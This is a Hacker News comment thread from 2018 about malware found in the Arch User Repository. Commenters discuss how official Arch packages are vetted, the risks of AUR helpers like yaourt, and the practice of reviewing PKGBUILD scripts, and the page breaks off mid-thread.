<html lang="en" op="item"><head><meta name="referrer" content="origin"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link rel="stylesheet" type="text/css" href="news.css?yE5dZK2wZfJm7XnFvFE9">
        <link rel="shortcut icon" href="favicon.ico">
        <title>Arch Linux AUR Repository Found to Contain Malware | Hacker News</title></head><body><center><table id="hnmain" border="0" cellpadding="0" cellspacing="0" width="85%" bgcolor="#f6f6ef">
        <tr><td bgcolor="#ff6600"><table border="0" cellpadding="0" cellspacing="0" width="100%" style="padding:2px"><tr><td style="width:18px;padding-right:4px"><a href="https://news.ycombinator.com"><img src="y18.gif" width="18" height="18" style="border:1px white solid;"></a></td>
                  <td style="line-height:12pt; height:10px;"><span class="pagetop"><b class="hnname"><a href="news">Hacker News</a></b>
                            <a href="newest">new</a> | <a href="front">past</a> | <a href="newcomments">comments</a> | <a href="ask">ask</a> | <a href="show">show</a> | <a href="jobs">jobs</a> | <a href="submit">submit</a>            </span></td><td style="text-align:right;padding-right:4px;"><span class="pagetop">
                              <a href="login?goto=item%3Fid%3D17501379">login</a>
                          </span></td>
              </tr></table></td></tr>
<tr id="pagespace" title="Arch Linux AUR Repository Found to Contain Malware" style="height:10px"></tr><tr><td><table class="fatitem" border="0">
        <tr class='athing' id='17501379'>
      <td align="right" valign="top" class="title"><span class="rank"></span></td>      <td valign="top" class="votelinks"><center><a id='up_17501379'href='vote?id=17501379&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center></td><td class="title"><span class="titleline"><a href="https://sensorstechforum.com/arch-linux-aur-repository-found-contain-malware/">Arch Linux AUR Repository Found to Contain Malware</a><span class="sitebit comhead"> (<a href="from?site=sensorstechforum.com"><span class="sitestr">sensorstechforum.com</span></a>)</span></span></td></tr><tr><td colspan="2"></td><td class="subtext"><span class="subline">
          <span class="score" id="score_17501379">152 points</span> by <a href="user?id=fdm" class="hnuser">fdm</a> <span class="age" title="2018-07-10T19:38:02"><a href="item?id=17501379">on July 10, 2018</a></span> <span id="unv_17501379"></span> | <a href="hide?id=17501379&amp;goto=item%3Fid%3D17501379">hide</a> | <a href="https://hn.algolia.com/?query=Arch%20Linux%20AUR%20Repository%20Found%20to%20Contain%20Malware&type=story&dateRange=all&sort=byDate&storyText=false&prefix&page=0" class="hnpast">past</a> | <a href="fave?id=17501379&amp;auth=83533e17a0a5d6acdf56183f6d62fa0cf2444062">favorite</a> | <a href="item?id=17501379">136&nbsp;comments</a>        </span>
              </td></tr>
        </table><br><br><table border="0" class='comment-tree'>
            <tr class='athing comtr' id='17501464'><td><table border='0'>  <tr>    <td class='ind' indent='0'><img src="s.gif" height="1" width="0"></td><td valign="top" class="votelinks">
      <center><a id='up_17501464'href='vote?id=17501464&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=cmiles74" class="hnuser">cmiles74</a> <span class="age" title="2018-07-10T19:50:22"><a href="item?id=17501464">on July 10, 2018</a></span> <span id="unv_17501464"></span>          <span class='navs'>
             | <a href="#17501895" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17501464" n="22" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">From the article:<p>&quot;This is yet another incident that showcases that Linux users should not explicitly trust user-controlled repositories.&quot;<p>LOL. Why should this only apply to Linux users? We should all be wary of downloading random things from websites.<p>AUR has always been labeled &quot;user submitted&quot;, but I guess it&#x27;s easy to forget that some &quot;users&quot; are really out to cause harm.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17501695'><td><table border='0'>  <tr>    <td class='ind' indent='1'><img src="s.gif" height="1" width="40"></td><td valign="top" class="votelinks">
      <center><a id='up_17501695'href='vote?id=17501695&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=21" class="hnuser">21</a> <span class="age" title="2018-07-10T20:15:50"><a href="item?id=17501695">on July 10, 2018</a></span> <span id="unv_17501695"></span>          <span class='navs'>
             | <a href="#17501464" class="clicky" aria-hidden="true">parent</a> | <a href="#17502793" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17501695" n="8" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">Because there is this myth that only Windows users get infected because Windows is insecure, that packages are vetted, that code being open source means that a backdoor insertion would quickly be discovered, and so on.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17502019'><td><table border='0'>  <tr>    <td class='ind' indent='2'><img src="s.gif" height="1" width="80"></td><td valign="top" class="votelinks">
      <center><a id='up_17502019'href='vote?id=17502019&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=ploxiln" class="hnuser">ploxiln</a> <span class="age" title="2018-07-10T20:48:16"><a href="item?id=17502019">on July 10, 2018</a></span> <span id="unv_17502019"></span>          <span class='navs'>
             | <a href="#17501464" class="clicky" aria-hidden="true">root</a> | <a href="#17501695" class="clicky" aria-hidden="true">parent</a> | <a href="#17502793" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17502019" n="7" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">Packages are vetted, in the repos, just not in AUR.<p>They also keep tools that would easily&#x2F;automatically build and install packages from AUR out of the main repos, to encourage manual handling and individual consideration of AUR package build scripts.<p>Also this malware was found in AUR within a few hours of it going up.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17502286'><td><table border='0'>  <tr>    <td class='ind' indent='3'><img src="s.gif" height="1" width="120"></td><td valign="top" class="votelinks">
      <center><a id='up_17502286'href='vote?id=17502286&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=xiii1408" class="hnuser">xiii1408</a> <span class="age" title="2018-07-10T21:19:35"><a href="item?id=17502286">on July 10, 2018</a></span> <span id="unv_17502286"></span>          <span class='navs'>
             | <a href="#17501464" class="clicky" aria-hidden="true">root</a> | <a href="#17502019" class="clicky" aria-hidden="true">parent</a> | <a href="#17503240" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17502286" n="1" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">Exactly.  It&#x27;s actually kind of a success story for the AUR, since they found the malware so quickly.<p>Of course, it would be more interesting if we could scan or survey the AUR to get a percentage of suspicious packages.  I&#x27;ve long been under the impression that some popular AUR packages (e.g. Google Chrome) are pretty safe from tampering.  For anything else, I glance over the PKGBUILD to make sure it&#x27;s not doing anything obviously fishy, and I&#x27;ve never noticed anything.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
            <tr class='athing comtr' id='17503240'><td><table border='0'>  <tr>    <td class='ind' indent='3'><img src="s.gif" height="1" width="120"></td><td valign="top" class="votelinks">
      <center><a id='up_17503240'href='vote?id=17503240&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=dataflow" class="hnuser">dataflow</a> <span class="age" title="2018-07-10T23:49:01"><a href="item?id=17503240">on July 10, 2018</a></span> <span id="unv_17503240"></span>          <span class='navs'>
             | <a href="#17501464" class="clicky" aria-hidden="true">root</a> | <a href="#17502019" class="clicky" aria-hidden="true">parent</a> | <a href="#17502286" class="clicky" aria-hidden="true">prev</a> | <a href="#17502793" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17503240" n="5" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">How are official Arch packages vetted?</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17503329'><td><table border='0'>  <tr>    <td class='ind' indent='4'><img src="s.gif" height="1" width="160"></td><td valign="top" class="votelinks">
      <center><a id='up_17503329'href='vote?id=17503329&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=BurningCycles" class="hnuser">BurningCycles</a> <span class="age" title="2018-07-11T00:05:29"><a href="item?id=17503329">on July 11, 2018</a></span> <span id="unv_17503329"></span>          <span class='navs'>
             | <a href="#17501464" class="clicky" aria-hidden="true">root</a> | <a href="#17503240" class="clicky" aria-hidden="true">parent</a> | <a href="#17503306" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17503329" n="3" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">They are built by the core Arch developers, or as in the case of the &#x27;community&#x27; repo, by &#x27;Trusted Users&#x27;, the latter being people who have done high quality maintaining of packages in the AUR and shown good community involvement.<p>Having met these criterias, they need to be sponsored by an existing TU, and then it will be put up to a vote.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17506240'><td><table border='0'>  <tr>    <td class='ind' indent='5'><img src="s.gif" height="1" width="200"></td><td valign="top" class="votelinks">
      <center><a id='up_17506240'href='vote?id=17506240&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=heywire" class="hnuser">heywire</a> <span class="age" title="2018-07-11T12:11:22"><a href="item?id=17506240">on July 11, 2018</a></span> <span id="unv_17506240"></span>          <span class='navs'>
             | <a href="#17501464" class="clicky" aria-hidden="true">root</a> | <a href="#17503329" class="clicky" aria-hidden="true">parent</a> | <a href="#17505001" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17506240" n="1" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">Do you know if there is any kind of review process?  For example, let’s say a core maintainer’s machine is compromised and the attacker submits a new package on their behalf. Does anyone else need to review and sign off on the new package?</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
            <tr class='athing comtr' id='17505001'><td><table border='0'>  <tr>    <td class='ind' indent='5'><img src="s.gif" height="1" width="200"></td><td valign="top" class="votelinks">
      <center><a id='up_17505001'href='vote?id=17505001&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=dataflow" class="hnuser">dataflow</a> <span class="age" title="2018-07-11T07:11:57"><a href="item?id=17505001">on July 11, 2018</a></span> <span id="unv_17505001"></span>          <span class='navs'>
             | <a href="#17501464" class="clicky" aria-hidden="true">root</a> | <a href="#17503329" class="clicky" aria-hidden="true">parent</a> | <a href="#17506240" class="clicky" aria-hidden="true">prev</a> | <a href="#17503306" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17505001" n="1" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">Thank you!</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                  <tr class='athing comtr' id='17503306'><td><table border='0'>  <tr>    <td class='ind' indent='4'><img src="s.gif" height="1" width="160"></td><td valign="top" class="votelinks">
      <center><a id='up_17503306'href='vote?id=17503306&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=Foxboron" class="hnuser">Foxboron</a> <span class="age" title="2018-07-10T23:59:01"><a href="item?id=17503306">on July 10, 2018</a></span> <span id="unv_17503306"></span>          <span class='navs'>
             | <a href="#17501464" class="clicky" aria-hidden="true">root</a> | <a href="#17503240" class="clicky" aria-hidden="true">parent</a> | <a href="#17503329" class="clicky" aria-hidden="true">prev</a> | <a href="#17502793" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17503306" n="1" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">Depends on what you deem &quot;vetted&quot;. Builds from source from a trusted source. Try ask if they can PGP sign their sources. Builds fine. Pushed to the repos. If its an package from core or extra it goes through testing for a few days.<p>Also been a push towards reproducible builds, and the stones have been laid with pacman 5.1.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                              <tr class='athing comtr' id='17502793'><td><table border='0'>  <tr>    <td class='ind' indent='1'><img src="s.gif" height="1" width="40"></td><td valign="top" class="votelinks">
      <center><a id='up_17502793'href='vote?id=17502793&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=wyclif" class="hnuser">wyclif</a> <span class="age" title="2018-07-10T22:32:40"><a href="item?id=17502793">on July 10, 2018</a></span> <span id="unv_17502793"></span>          <span class='navs'>
             | <a href="#17501464" class="clicky" aria-hidden="true">parent</a> | <a href="#17501695" class="clicky" aria-hidden="true">prev</a> | <a href="#17502310" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17502793" n="1" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">Unofficial user repositories contain unofficial user software. Shockers!<p>Sarcasm aside, I think a lot of the pearl-clutching over this incident is down to people not understanding the difference between the official repositories and the AUR.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
            <tr class='athing comtr' id='17502310'><td><table border='0'>  <tr>    <td class='ind' indent='1'><img src="s.gif" height="1" width="40"></td><td valign="top" class="votelinks">
      <center><a id='up_17502310'href='vote?id=17502310&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=trash_panda" class="hnuser">trash_panda</a> <span class="age" title="2018-07-10T21:22:33"><a href="item?id=17502310">on July 10, 2018</a></span> <span id="unv_17502310"></span>          <span class='navs'>
             | <a href="#17501464" class="clicky" aria-hidden="true">parent</a> | <a href="#17502793" class="clicky" aria-hidden="true">prev</a> | <a href="#17501895" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17502310" n="12" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">Of course, one should be careful about what one installs on their system. Even more so an Arch user, which should be technical saavy in the first place.<p>Anyways, I know I don&#x27;t manually review everything I install on my system, I trust the packet manager.<p>I&#x27;m not an Arch user so I don&#x27;t know, but doest the AUR repo have some kind of code signing or automatic analysis of the packages?</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17502413'><td><table border='0'>  <tr>    <td class='ind' indent='2'><img src="s.gif" height="1" width="80"></td><td valign="top" class="votelinks">
      <center><a id='up_17502413'href='vote?id=17502413&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=chias" class="hnuser">chias</a> <span class="age" title="2018-07-10T21:37:24"><a href="item?id=17502413">on July 10, 2018</a></span> <span id="unv_17502413"></span>          <span class='navs'>
             | <a href="#17501464" class="clicky" aria-hidden="true">root</a> | <a href="#17502310" class="clicky" aria-hidden="true">parent</a> | <a href="#17502378" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17502413" n="7" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">AUR is not an &quot;official&quot; repository at all -- indeed the acronym stands for &quot;Arch User Repository&quot;. Kinda like github, you can go put whatever you want in there, and people can download and install it on their machines if they want to.<p>The &quot;correct&quot; way to install something from AUR is to go grab the install script, READ THROUGH IT CAREFULLY, then knowing that you just downloaded a thing uploaded by someone unafilliated with Arch, you make your decision on whether or not to run&#x2F;install it. That said, there are (non-official) package managers that you can use which give you a package-manager-like experience installing packages from AUR and do a pretty good job of sweeping all of that under the rug. Convenient? yes; a good idea? it&#x27;s your system, you decide (my opinion is &#x27;no&#x27;).</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17503613'><td><table border='0'>  <tr>    <td class='ind' indent='3'><img src="s.gif" height="1" width="120"></td><td valign="top" class="votelinks">
      <center><a id='up_17503613'href='vote?id=17503613&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=mikekchar" class="hnuser">mikekchar</a> <span class="age" title="2018-07-11T01:04:42"><a href="item?id=17503613">on July 11, 2018</a></span> <span id="unv_17503613"></span>          <span class='navs'>
             | <a href="#17501464" class="clicky" aria-hidden="true">root</a> | <a href="#17502413" class="clicky" aria-hidden="true">parent</a> | <a href="#17504611" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17503613" n="5" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">&gt; a good idea? it&#x27;s your system, you decide (my opinion is &#x27;no&#x27;).<p>This frustrates me.  Because there is a large vocal group that opposes the use of yaourt (the most popular AUR package manager), I spent a year building packages by hand, just to see if there was something I was missing.  I was not.  It&#x27;s just a complete PITA.  In the end, I wrote scripts that just about duplicated yaourt -- checks for new versions of packages that I&#x27;ve installed, downloads the latest comments so I can see if there has been any controversy, checks for and installs dependencies, etc, etc.<p>There is nothing in the manual process that makes it more safe than installing with yaourt.  Yaourt prompts you to edit the PKGBUILD file (and even defaults to this!).  It is just as easy (and in fact, I think easier) to neglect to check what it&#x27;s doing when you are building by hand.<p>After a year of building by hand, I went back to yaourt because I have better things to do with my time than write scripts that duplicate it.<p>I think the real issue is that many people do not want to legitimise AUR as a source of packages for everyday people.  I can sympathise with this point of view and even agree to it to a certain extent.  However, avoiding using a tool like yaourt is cutting off your nose to spite your face, IMHO.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17503723'><td><table border='0'>  <tr>    <td class='ind' indent='4'><img src="s.gif" height="1" width="160"></td><td valign="top" class="votelinks">
      <center><a id='up_17503723'href='vote?id=17503723&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=Zancarius" class="hnuser">Zancarius</a> <span class="age" title="2018-07-11T01:26:05"><a href="item?id=17503723">on July 11, 2018</a></span> <span id="unv_17503723"></span>          <span class='navs'>
             | <a href="#17501464" class="clicky" aria-hidden="true">root</a> | <a href="#17503613" class="clicky" aria-hidden="true">parent</a> | <a href="#17505950" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17503723" n="2" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">&gt; There is nothing in the manual process that makes it more safe than installing with yaourt. Yaourt prompts you to edit the PKGBUILD file (and even defaults to this!). It is just as easy (and in fact, I think easier) to neglect to check what it&#x27;s doing when you are building by hand.<p>I get your point, but I think part of the reason for the official stance against AUR helpers is that they incline users to skip any manual vetting of the PKGBUILDs on their own. In practice, you&#x27;re always going to have some subset of the population who won&#x27;t even look at the source PKGBUILDs (helper or not), but I think this is a valid concern. If you download the package sources manually, the effort required to type &quot;makepkg&quot; versus &quot;less PKGBUILD&quot; isn&#x27;t significant. Contrast this to using a helper, where pressing a key to continue building is an awful lot more tempting than having the helper open the PKGBUILD in your editor (where you now have to press many more keys to continue)--regardless of the defaults.<p>What I tend to do is use an AUR helper to download the package sources and then manually build them from there. Helpers are incredibly useful for searching&#x2F;downloading sources from the command line, but I&#x27;m not completely convinced having them build&#x2F;install everything unattended is a particularly great idea. Part of this is the nature of the AUR and part of this is because if you use enough packages from the AUR, sooner or later, you&#x27;re going to have to intervene and fix something (which defeats the point of using the helper in the first place). Plus, using the helper as a glorified fetch tool gives you something of an intermediate package cache as opposed to dumping everything in &#x2F;tmp and nuking it between boots.<p>That said, I do agree it&#x27;s more to avoid legitimizing the AUR. There&#x27;s good reasons for this (legal and otherwise). But I think it&#x27;s important for people to decide precisely <i>how</i> they wish to use the AUR as long as they understand the repercussions.<p>Also, I believe yaourt is considered deprecated as it hasn&#x27;t seen updates in quite some time. I&#x27;d suggest something else like aurman or yay.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17504640'><td><table border='0'>  <tr>    <td class='ind' indent='5'><img src="s.gif" height="1" width="200"></td><td valign="top" class="votelinks">
      <center><a id='up_17504640'href='vote?id=17504640&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=laumars" class="hnuser">laumars</a> <span class="age" title="2018-07-11T05:25:57"><a href="item?id=17504640">on July 11, 2018</a></span> <span id="unv_17504640"></span>          <span class='navs'>
             | <a href="#17501464" class="clicky" aria-hidden="true">root</a> | <a href="#17503723" class="clicky" aria-hidden="true">parent</a> | <a href="#17505950" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17504640" n="1" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">I think you&#x27;re clutching at straws to be honest.<p>&gt; If you download the package sources manually, the effort required to type &quot;makepkg&quot; versus &quot;less PKGBUILD&quot; isn&#x27;t significant. Contrast this to using a helper, where pressing a key to continue building is an awful lot more tempting than having the helper open the PKGBUILD in your editor (where you now have to press many more keys to continue)--regardless of the defaults.<p>You could make the same  argument about effort to skip checking being fewer keystrokes to argue that yaourt makes its more convenient to check because that is also fewer keystrokes than typing an additional command manually in the command line. Thus I think the actual reality is people who are lazy will skip a self audit regardless of how they choose to build the package. Ie youart isn&#x27;t problem.<p>&gt; Plus, using the helper as a glorified fetch tool gives you something of an intermediate package cache as opposed to dumping everything in &#x2F;tmp and nuking it between boots.<p>So change the build location. It&#x27;s all configurable. &#x2F;tmp makes sense as a default but I have mine set elsewhere. On a previous system I even had yaourt configured to build in its own ZFS tank.<p>&gt; Also, I believe yaourt is considered deprecated as it hasn&#x27;t seen updates in quite some time. I&#x27;d suggest something else like aurman or yay.<p>I often hear the same complaint made about Android apps (re it&#x27;s not been updated in a while) but when it already does everything it needs to then why should it need to see further updates? It&#x27;s not like yaourt doesn&#x27;t keep track of security updates (I mean it&#x27;s all just wrappers around GNU and BSD tools so if there&#x27;s a bug in tar or OpenSSL then they will be updated independently anyway).<p>I&#x27;ve been using yaourt for several years and frankly I&#x27;ve never once felt &quot;damn, this thing needs more maintenance&quot;.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                  <tr class='athing comtr' id='17505950'><td><table border='0'>  <tr>    <td class='ind' indent='4'><img src="s.gif" height="1" width="160"></td><td valign="top" class="votelinks">
      <center><a id='up_17505950'href='vote?id=17505950&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=rcxdude" class="hnuser">rcxdude</a> <span class="age" title="2018-07-11T11:02:07"><a href="item?id=17505950">on July 11, 2018</a></span> <span id="unv_17505950"></span>          <span class='navs'>
             | <a href="#17501464" class="clicky" aria-hidden="true">root</a> | <a href="#17503613" class="clicky" aria-hidden="true">parent</a> | <a href="#17503723" class="clicky" aria-hidden="true">prev</a> | <a href="#17506704" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17505950" n="1" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">AFAIK yaourt specifically is discouraged because its possible for a malicious PKGBUILD file to execute code before it is displayed to you (as a consequence of the way yaourt parses the files). Other AUR helpers do not have this problem.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
            <tr class='athing comtr' id='17506704'><td><table border='0'>  <tr>    <td class='ind' indent='4'><img src="s.gif" height="1" width="160"></td><td valign="top" class="votelinks">
      <center><a id='up_17506704'href='vote?id=17506704&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=cmiles74" class="hnuser">cmiles74</a> <span class="age" title="2018-07-11T13:36:44"><a href="item?id=17506704">on July 11, 2018</a></span> <span id="unv_17506704"></span>          <span class='navs'>
             | <a href="#17501464" class="clicky" aria-hidden="true">root</a> | <a href="#17503613" class="clicky" aria-hidden="true">parent</a> | <a href="#17505950" class="clicky" aria-hidden="true">prev</a> | <a href="#17504611" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17506704" n="1" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">In my opinion, this is a hard problem and not one that we can expect Arch Linux to take on or solve. We&#x27;re talking about how we establish that a software package (source code, build script, binaries, etc.) can be deemed trustworthy such that we feel comfortable installing it onto our machine (which may hold important data, personal, financial, etc.) I don&#x27;t think anyone has a good solution, with the Apple App Store at one extreme and (in my opinion) something like AUR at the other.<p>Arch discourages tools like yaourt because it makes it so easy to install some an unvetted package and that opens you up to the very real risk of installing malware. As you point out, downloading the package and building it isn&#x27;t any safer if you don&#x27;t read through the script. It&#x27;s easy to make the argument that a casual read through of the package file will only catch the most obviously bad packages and a clever person could easily find better ways to hide their malware payload, so why bother looking at all?<p>If you aren&#x27;t going to read the package files, you may as well use a tool like yaourt; there&#x27;s effectively no difference. In my own experience it&#x27;s rare that I have to install something from AUR so I can take the time to briefly scroll through the package files and check where the source code is coming from, easy stuff like that.<p>In the back of my mind, I understand I&#x27;m taking a risk; I think that&#x27;s what Arch is trying to accomplish by discouraging tools like yaourt.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                  <tr class='athing comtr' id='17504611'><td><table border='0'>  <tr>    <td class='ind' indent='3'><img src="s.gif" height="1" width="120"></td><td valign="top" class="votelinks">
      <center><a id='up_17504611'href='vote?id=17504611&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=laumars" class="hnuser">laumars</a> <span class="age" title="2018-07-11T05:17:53"><a href="item?id=17504611">on July 11, 2018</a></span> <span id="unv_17504611"></span>          <span class='navs'>
             | <a href="#17501464" class="clicky" aria-hidden="true">root</a> | <a href="#17502413" class="clicky" aria-hidden="true">parent</a> | <a href="#17503613" class="clicky" aria-hidden="true">prev</a> | <a href="#17502378" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17504611" n="1" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">I can&#x27;t speak for all AUR managers but the one I use (yaourt) is probably the most popular one on Arch and it definitely does prompt you to audit the package before you compile it.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                  <tr class='athing comtr' id='17502378'><td><table border='0'>  <tr>    <td class='ind' indent='2'><img src="s.gif" height="1" width="80"></td><td valign="top" class="votelinks">
      <center><a id='up_17502378'href='vote?id=17502378&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=xiii1408" class="hnuser">xiii1408</a> <span class="age" title="2018-07-10T21:32:35"><a href="item?id=17502378">on July 10, 2018</a></span> <span id="unv_17502378"></span>          <span class='navs'>
             | <a href="#17501464" class="clicky" aria-hidden="true">root</a> | <a href="#17502310" class="clicky" aria-hidden="true">parent</a> | <a href="#17502413" class="clicky" aria-hidden="true">prev</a> | <a href="#17502388" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17502378" n="3" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
